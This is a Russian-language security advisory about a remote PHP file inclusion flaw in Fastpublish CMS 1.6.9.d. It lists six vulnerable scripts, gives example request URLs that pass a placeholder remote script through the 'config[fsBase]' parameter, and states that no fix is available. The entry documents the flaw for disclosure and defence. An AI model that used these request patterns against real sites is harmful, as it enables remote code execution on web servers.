PHP-инклюдинг в Fastpublish CMS

Дата публикации:
06.06.2006
Дата изменения:
06.10.2008
Всего просмотров:
1355
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Fastpublish CMS 1.x
Уязвимые версии: Fastpublish CMS 1.6.9.d, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "config[fsBase]" в сценариях drucken.php, drucken2.php, email_an_benutzer.php, rechnung.php, suche/search.php и adminbereich/admin.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]
http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]
http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]
http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]
http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]
http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]

URL производителя: www.fastpublish.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities

или введите имя

CAPTCHA